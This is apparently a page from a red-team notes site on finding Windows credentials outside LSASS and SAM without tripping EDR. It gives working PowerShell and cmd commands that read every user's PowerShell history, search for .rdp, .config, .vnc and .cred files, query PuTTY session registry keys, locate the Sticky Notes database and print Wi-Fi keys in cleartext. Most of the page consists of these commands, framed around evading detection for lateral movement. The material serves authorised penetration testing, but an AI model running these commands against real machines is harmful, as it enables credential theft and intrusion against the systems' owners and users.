Other Targets

Other Targets

LSASS, SAM, and Windows Credentials are all typically heavily monitored by EDR. If you aren't trying to set off alarms, it may be worth it to explore some alternative sources of credentials for lateral movement or privilege escalation.

Command History

PowerShell command history is an awesome source of cleartext credentials or connection strings. 

gc (Get-PSReadLineOption).HistorySavePath

Here is a one-liner to list every user's PowerShell history.

foreach($user in ((ls C:\users).fullname)){cat "$user\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt" -ErrorAction SilentlyContinue}

Files

I typically start by simply looking at what the user directories have to offer. Most of the time all user directories will be empty except for one or two. After that you can quickly narrow things down with a few commands.

Get-ChildItem -Depth 2 C:\users\
Get-ChildItem C:\ -Recurse -Include *.rdp, *.config, *.vnc, *.cred -ErrorAction Ignore

Registry / Installed Programs

The registry is most powerful as a credential source when paired with knowledge of installed programs. A common target is PuTTY.

reg query HKEY_CURRENT_USER\SOFTWARE\SimonTatham\PuTTY\Sessions

Here is a PowerShell snippet to cleanly list installed programs.

$INSTALLED = Get-ItemProperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* |  Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED += Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, InstallLocation
$INSTALLED | ?{ $_.DisplayName -ne $null } | sort-object -Property DisplayName -Unique | Format-Table -AutoSize

Sticky Notes

Sticky notes are super underrated. They are stored as a cleartext SQLite file.

C:\Users\<user>\AppData\Local\Packages\Microsoft.MicrosoftStickyNotes_8wekyb3d8bbwe\LocalState\plum.sqlite

Wi-Fi Passwords

I wouldn't say this has ever helped me, but it can be nice to use.

netsh wlan show profile
netsh wlan show profile [profilename] key=clear
PreviousPivoting to EntraNextAzure/O365

Last updated